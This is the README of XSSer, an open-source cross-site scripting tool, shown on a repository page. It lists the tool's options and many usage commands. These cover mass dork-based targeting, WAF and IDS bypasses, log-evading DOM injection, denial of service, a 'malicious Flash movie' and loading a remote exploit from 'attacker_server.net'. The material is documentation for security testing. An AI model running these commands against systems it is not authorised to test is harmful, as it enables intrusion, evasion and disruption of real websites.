Home Verkennen Help
Inloggen
epsylon
/
xsser
Volgen 1
Ster 0
Vork 0
Bestanden Kwesties 0 Pull-aanvragen 0
Boom: b07980f81d
Aftakkingen Labels
xsser
/
doc
/
README

README 14 KB
Geschiedenis Ruwe

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351 
  1. ================================================================
    2. 

  2. Introduction:
    3. 

  3. ==============================
    4. 

  4. 

  5. Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
    6. 

  6. 

  7. ================================================================
    8. 

  8. Current Version:
    9. 

  9. ==============================
    10. 

  10. 

  11. XSSer v1.8[1]: "The Hive!" (2010/2019) // [https://xsser.03c8.net]
    12. 

  12. 

  13. ================================================================
    14. 

  14. Options and features:
    15. 

  15. ==============================
    16. 

  16.  
    17. 

  17. Usage: 
    18. 

  18. 

  19. xsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]
    20. 

  20. [Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}
    21. 

  21. 

  22. Cross Site "Scripter" is an automatic -framework- to detect, exploit and
    23. 

  23. report XSS vulnerabilities in web-based applications.
    24. 

  24. 

  25. Options:
    26. 

  26.   --version             show program's version number and exit
    27. 

  27.   -h, --help            show this help message and exit
    28. 

  28.   -s, --statistics      show advanced statistics output results
    29. 

  29.   -v, --verbose         active verbose mode output results
    30. 

  30.   --gtk                 launch XSSer GTK Interface
    31. 

  31.   --wizard              start Wizard Helper!
    32. 

  32. 

  33.   *Special Features*:
    34. 

  34.     You can set Vector(s) and Bypasser(s) to build complex scripts for XSS
    35. 

  35.     code embedded. XST allows you to discover if target is vulnerable to
    36. 

  36.     'Cross Site Tracing' [CAPEC-107]:
    37. 

  37. 

  38.     --imx=IMX           IMX - Create an image with XSS (--imx image.png)
    39. 

  39.     --fla=FLASH         FLA - Create a flash movie with XSS (--fla movie.swf)
    40. 

  40.     --xst=XST           XST - Cross Site Tracing (--xst http(s)://host.com)
    41. 

  41. 

  42.   *Select Target(s)*:
    43. 

  43.     At least one of these options must to be specified to set the source
    44. 

  44.     to get target(s) urls from:
    45. 

  45. 

  46.     --all=TARGET        Automatically audit an entire target
    47. 

  47.     -u URL, --url=URL   Enter target to audit
    48. 

  48.     -i READFILE         Read target(s) urls from file
    49. 

  49.     -d DORK             Search target(s) using a query (ex: 'news.php?id=')
    50. 

  50.     -l                  Search from a list of 'dorks'
    51. 

  51.     --De=DORK_ENGINE    Use this search engine (default: yahoo)
    52. 

  52.     --Da                Search massively using all search engines
    53. 

  53. 

  54.   *Select type of HTTP/HTTPS Connection(s)*:
    55. 

  55.     These options can be used to specify which parameter(s) we want to use
    56. 

  56.     as payload(s). Set 'XSS' as keyword on the place(s) that you want to
    57. 

  57.     inject:
    58. 

  58. 

  59.     -g GETDATA          Send payload using GET (ex: '/menu.php?id=XSS')
    60. 

  60.     -p POSTDATA         Send payload using POST (ex: 'foo=1&bar=XSS')
    61. 

  61.     -c CRAWLING         Number of urls to crawl on target(s): 1-99999
    62. 

  62.     --Cw=CRAWLER_WIDTH  Deeping level of crawler: 1-5 (default: 2)
    63. 

  63.     --Cl                Crawl only local target(s) urls (default: FALSE)
    64. 

  64. 

  65.   *Configure Request(s)*:
    66. 

  66.     These options can be used to specify how to connect to the target(s)
    67. 

  67.     payload(s). You can choose multiple:
    68. 

  68. 

  69.     --head              Send a HEAD request before start a test
    70. 

  70.     --cookie=COOKIE     Change your HTTP Cookie header
    71. 

  71.     --drop-cookie       Ignore Set-Cookie header from response
    72. 

  72.     --user-agent=AGENT  Change your HTTP User-Agent header (default: SPOOFED)
    73. 

  73.     --referer=REFERER   Use another HTTP Referer header (default: NONE)
    74. 

  74.     --xforw             Set your HTTP X-Forwarded-For with random IP values
    75. 

  75.     --xclient           Set your HTTP X-Client-IP with random IP values
    76. 

  76.     --headers=HEADERS   Extra HTTP headers newline separated
    77. 

  77.     --auth-type=ATYPE   HTTP Authentication type (Basic, Digest, GSS or NTLM)
    78. 

  78.     --auth-cred=ACRED   HTTP Authentication credentials (name:password)
    79. 

  79.     --check-tor         Check to see if Tor is used properly
    80. 

  80.     --proxy=PROXY       Use proxy server (tor: http://localhost:8118)
    81. 

  81.     --ignore-proxy      Ignore system default HTTP proxy
    82. 

  82.     --timeout=TIMEOUT   Select your timeout (default: 30)
    83. 

  83.     --retries=RETRIES   Retries when connection timeout (default: 1)
    84. 

  84.     --threads=THREADS   Maximum number of concurrent requests (default: 5)
    85. 

  85.     --delay=DELAY       Delay in seconds between each request (default: 0)
    86. 

  86.     --tcp-nodelay       Use the TCP_NODELAY option
    87. 

  87.     --follow-redirects  Follow server redirection responses (302)
    88. 

  88.     --follow-limit=FLI  Set limit for redirection requests (default: 50)
    89. 

  89. 

  90.   *Checker Systems*:
    91. 

  91.     These options are useful to know if your target is using filters
    92. 

  92.     against XSS attacks:
    93. 

  93. 

  94.     --hash              Send a hash to check if target is repeating content
    95. 

  95.     --heuristic         Discover parameters filtered by using heuristics
    96. 

  96.     --discode=DISCODE   Set code on reply to discard an injection
    97. 

  97.     --checkaturl=ALT    Check reply using: <alternative url> [aka BLIND-XSS]
    98. 

  98.     --checkmethod=ALTM  Check reply using: GET or POST (default: GET)
    99. 

  99.     --checkatdata=ALD   Check reply using: <alternative payload>
    100. 

  100.     --reverse-check     Establish a reverse connection from target to XSSer
    101. 

  101.     --reverse-open      Open a web browser when a reverse check is established
    102. 

  102. 

  103.   *Select Vector(s)*:
    104. 

  104.     These options can be used to specify injection(s) code. Important if
    105. 

  105.     you don't want to inject a common XSS vector used by default. Choose
    106. 

  106.     only one option:
    107. 

  107. 

  108.     --payload=SCRIPT    OWN   - Inject your own code
    109. 

  109.     --auto              AUTO  - Inject a list of vectors provided by XSSer
    110. 

  110. 

  111.   *Select Payload(s)*:
    112. 

  112.     These options can be used to set the list of vectors provided by
    113. 

  113.     XSSer. Choose only if required:
    114. 

  114. 

  115.     --auto-set=FZZ_NUM  ASET  - Limit of vectors to inject (default: 1293)
    116. 

  116.     --auto-info         AINFO - Select ONLY vectors with INFO (defaul: FALSE)
    117. 

  117.     --auto-random       ARAND - Set random to order (default: FALSE)
    118. 

  118. 

  119.   *Anti-antiXSS Firewall rules*:
    120. 

  120.     These options can be used to try to bypass specific WAF/IDS products
    121. 

  121.     and some anti-XSS browser filters. Choose only if required:
    122. 

  122. 

  123.     --Phpids0.6.5       PHPIDS (0.6.5) [ALL]
    124. 

  124.     --Phpids0.7         PHPIDS (0.7) [ALL]
    125. 

  125.     --Imperva           Imperva Incapsula [ALL]
    126. 

  126.     --Webknight         WebKnight (4.1) [Chrome]
    127. 

  127.     --F5bigip           F5 Big IP [Chrome + FF + Opera]
    128. 

  128.     --Barracuda         Barracuda WAF [ALL]
    129. 

  129.     --Modsec            Mod-Security [ALL]
    130. 

  130.     --Quickdefense      QuickDefense [Chrome]
    131. 

  131.     --Firefox           Firefox 12 [& below]
    132. 

  132.     --Chrome            Chrome 19 & Firefox 12 [& below]
    133. 

  133.     --Opera             Opera 10.5 [& below]
    134. 

  134.     --Iexplorer         IExplorer 9 & Firefox 12 [& below]
    135. 

  135. 

  136.   *Select Bypasser(s)*:
    137. 

  137.     These options can be used to encode vector(s) and try to bypass
    138. 

  138.     possible anti-XSS filters. They can be combined with other techniques:
    139. 

  139. 

  140.     --Str               Use method String.FromCharCode()
    141. 

  141.     --Une               Use Unescape() function
    142. 

  142.     --Mix               Mix String.FromCharCode() and Unescape()
    143. 

  143.     --Dec               Use Decimal encoding
    144. 

  144.     --Hex               Use Hexadecimal encoding
    145. 

  145.     --Hes               Use Hexadecimal encoding with semicolons
    146. 

  146.     --Dwo               Encode IP addresses with DWORD
    147. 

  147.     --Doo               Encode IP addresses with Octal
    148. 

  148.     --Cem=CEM           Set different 'Character Encoding Mutations'
    149. 

  149.                         (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')
    150. 

  150. 

  151.   *Special Technique(s)*:
    152. 

  152.     These options can be used to inject code using different XSS
    153. 

  153.     techniques and fuzzing vectors. You can choose multiple:
    154. 

  154. 

  155.     --Coo               COO - Cross Site Scripting Cookie injection
    156. 

  156.     --Xsa               XSA - Cross Site Agent Scripting
    157. 

  157.     --Xsr               XSR - Cross Site Referer Scripting
    158. 

  158.     --Dcp               DCP - Data Control Protocol injections
    159. 

  159.     --Dom               DOM - Document Object Model injections
    160. 

  160.     --Ind               IND - HTTP Response Splitting Induced code
    161. 

  161. 

  162.   *Select Final injection(s)*:
    163. 

  163.     These options can be used to specify the final code to inject on
    164. 

  164.     vulnerable target(s). Important if you want to exploit 'on-the-wild'
    165. 

  165.     the vulnerabilities found. Choose only one option:
    166. 

  166. 

  167.     --Fp=FINALPAYLOAD   OWN    - Exploit your own code
    168. 

  168.     --Fr=FINALREMOTE    REMOTE - Exploit a script -remotely-
    169. 

  169. 

  170.   *Special Final injection(s)*:
    171. 

  171.     These options can be used to execute some 'special' injection(s) on
    172. 

  172.     vulnerable target(s). You can select multiple and combine them with
    173. 

  173.     your final code (except with DCP exploits):
    174. 

  174. 

  175.     --Anchor            ANC  - Use 'Anchor Stealth' payloader (DOM shadows!)
    176. 

  176.     --B64               B64  - Base64 code encoding in META tag (rfc2397)
    177. 

  177.     --Onm               ONM  - Use onMouseMove() event
    178. 

  178.     --Ifr               IFR  - Use <iframe> source tag
    179. 

  179.     --Dos               DOS  - XSS (client) Denial of Service
    180. 

  180.     --Doss              DOSs - XSS (server) Denial of Service
    181. 

  181. 

  182.   *Reporting*:
    183. 

  183.     --save              Export to file (XSSreport.raw)
    184. 

  184.     --xml=FILEXML       Export to XML (--xml file.xml)
    185. 

  185. 

  186.   *Miscellaneous*:
    187. 

  187.     --silent            Inhibit console output results
    188. 

  188.     --alive=ISALIVE     Set limit of errors before check if target is alive
    189. 

  189.     --update            Check for latest stable version
    190. 

  190. 

  191. ================================================================
    192. 

  192. Commands and examples:
    193. 

  193. ==============================
    194. 

  194. 

  195. ---------------------------------------
    196. 

  196. 

  197. * View HELP (Available commands):
    198. 

  198.  
    199. 

  199.   xsser -h (--help)
    200. 

  200. 

  201. ----------------------------------------
    202. 

  202. 

  203. * Check for latest stable version:
    204. 

  204. 

  205.   xsser --update
    206. 

  206. 

  207. ----------------------------------------
    208. 

  208. 

  209. * Launch GTK interface (GUI):
    210. 

  210. 

  211.   xsser --gtk
    212. 

  212. 

  213. ----------------------------------------
    214. 

  214. 

  215. * Simple injection from URL:<br><br>
    216. 

  216. 

  217.   xsser -u "https://target.com/XSS"
    218. 

  218. 

  219. ----------------------------------------
    220. 

  220. 

  221. * Simple injection from File, with Tor proxy and spoofing HTTP Referer headers
    222. 

  222. 

  223.   xsser -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "127.0.0.1"
    224. 

  224. 

  225. ----------------------------------------
    226. 

  226. 

  227. * Multiple injections from URL, with automatic payloading, establishing a reverse connection and showing statistics:
    228. 

  228. 

  229.   xsser -u "https:/target.com/XSS" --auto --reverse-check -s
    230. 

  230. 

  231. ----------------------------------------
    232. 

  232. 

  233. * Multiple injections from URL, with automatic payloading, using Tor proxy, using "Hexadecimal" encoding, with verbose output and saving results to file (XSSreport.raw):
    234. 

  234. 

  235.   xsser -u "https://target.com/XSS" --auto --proxy "http://127.0.0.1:8118" --Hex --verbose --save
    236. 

  236. 

  237. ----------------------------------------
    238. 

  238. 

  239. * Multiple injections from URL, with automatic payloading, using character encoding mutations (first, changing payload to 'Hexadecimal'; second, changing to 'StringFromCharCode' the first one; third, reencoding to 'Hexadecimal' the second one), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):
    240. 

  240. 

  241.   xsser -u "https://target.com/XSS" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer Pentesting Tool" --timeout "20" --threads "5"
    242. 

  242. 

  243. ----------------------------------------
    244. 

  244. 

  245. * Advanced injection from File, payloading your -own- code and using Unescape() character encoding to bypass filters:
    246. 

  246. 

  247.   xsser -i "urls.txt" --payload "<script>alert('XSSed');</script>" --Une
    248. 

  248. 

  249. ----------------------------------------
    250. 

  250. 

  251. * Injection from Dork, selecting "DuckDuckGo" as search engine:
    252. 

  252. 

  253.   xsser --De "duck" -d "search.php?q="
    254. 

  254. 

  255. ----------------------------------------
    256. 

  256. 

  257. * Injection from a list of Dorks extracted from a file (provided by XSSer) and using all search engines supported (XSSer Storm!):
    258. 

  258. 

  259.   xsser -l --Da 
    260. 

  260. 

  261. ----------------------------------------
    262. 

  262. 

  263. * Injection from Crawler with deep 2 and 200 pages to review (XSSer Spider!):
    264. 

  264. 

  265.   xsser -c 200 --Cw=2 -u "https://target.com"
    266. 

  266. 

  267. ----------------------------------------
    268. 

  268. 

  269. * Simple injection from URL, to a POST parameter (ex: password), with statistics results:
    270. 

  270. 

  271.   xsser -u "https://target.com/login.php" -p "username=admin&password=XSS" -s
    272. 

  272. 

  273. ----------------------------------------
    274. 

  274. 

  275. * Multiple injections (with hex and int hashes) to multiple parameters on a single URLG and using GET:
    276. 

  276. 

  277.   xsser -u "https://target.com" -g "login.php?=usernameXSS&password=XSS&captcha=X1S" --auto
    278. 

  278. 

  279. ----------------------------------------
    280. 

  280. 

  281. * Simple injection from URL, using GET, injecting on Cookie, trying to use DOM shadow space (no server logging!) and if exists any vulnerability, exploiting your -own- final code:
    282. 

  282. 

  283.   xsser -u "https://target.com" -g "/news.asp?page=XSS" --Coo --Dom --Fp="<script>alert('XSSed');</script>"
    284. 

  284. 

  285. ----------------------------------------
    286. 

  286. 

  287. * Simple injection from URL, using GET and if exists any vulnerability, exploit a DoS (Denegation Of Service):
    288. 

  288. 

  289.   xsser -u "https://target.com" -g "/news.asp?page=XSS" --Dos
    290. 

  290. 

  291. ----------------------------------------
    292. 

  292. 

  293. * Multiple injections to multiple places, extracting targets from a File, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between requests to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and Cookies, using proxy Tor, with IP Octal obfuscation, with statistics results and using verbose mode (real player mode!): 
    294. 

  294. 

  295.   xsser -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose 
    296. 

  296. 

  297. ----------------------------------------
    298. 

  298. 

  299. * Injection of a XSS code provided by user on a -fake- image (ready to be uploaded to your public profile):<br><br>
    300. 

  300. 

  301.   xsser --Imx "test.png" --payload="<script>alert('XSSed');</script>"
    302. 

  302. 

  303. ----------------------------------------
    304. 

  304. 

  305. * Report dorking search (using all search engines) to a XML file:
    306. 

  306. 

  307.   xsser -d "login.php" --Da --xml "security_report_XSSer_Dork_login-php_allengines.xml" 
    308. 

  308. 

  309. ----------------------------------------
    310. 

  310. 

  311. * Create a malicious Flash movie :
    312. 

  312. 

  313.   xsser --fla "INFECTED_movie.swf"
    314. 

  314. 

  315. ----------------------------------------
    316. 

  316. 

  317. * Send a pre-checking hash to search for false -false positives-:
    318. 

  318. 

  319.   xsser -u "https://target.com" --hash
    320. 

  320. 

  321. ----------------------------------------
    322. 

  322. 

  323. * Discover parameters filtered on your target using heuristics:
    324. 

  324. 

  325.   xsser -u "https://target.com" --heuristic
    326. 

  326. 

  327. ----------------------------------------
    328. 

  328. 

  329. * Exploiting Base64 code encoding in META tag (rfc2397), just after inject a manual payload:
    330. 

  330.  
    331. 

  331.   xsser -u "https://target.com" -g "/index.php?id=XSS" --payload="<script>alert('XSSed');</script>" --B64
    332. 

  332. 

  333. ----------------------------------------
    334. 

  334. 

  335. * Exploiting your "own" -remote code- after discover a vulnerability using automatic fuzzing:<br><br>
    336. 

  336.  
    337. 

  337.   xsser -u "https://target.com" -g "/index.php?id=XSS" --auto --Fr "https://attacker_server.net/exploits/XSS/code.js"</b><br>
    338. 

  338. 

  339. ----------------------------------------
    340. 

  340. 

  341. * Apply Anti-antiXSS bypassers (ex: Imperva) before to inject you -own- code with verbose output:
    342. 

  342. 

  343.   xsser -u "https://target.com" -g "/index.php?id=XSS" --Imperva --payload="<script>alert('XSSed');</script>" -v
    344. 

  344. 

  345. ----------------------------------------
    346. 

  346. 

  347. * Search also "XSSer" on the Internet for more videos and tutorials...
    348. 

  348. 

  349.   [...]
    350. 

  350. 

  351.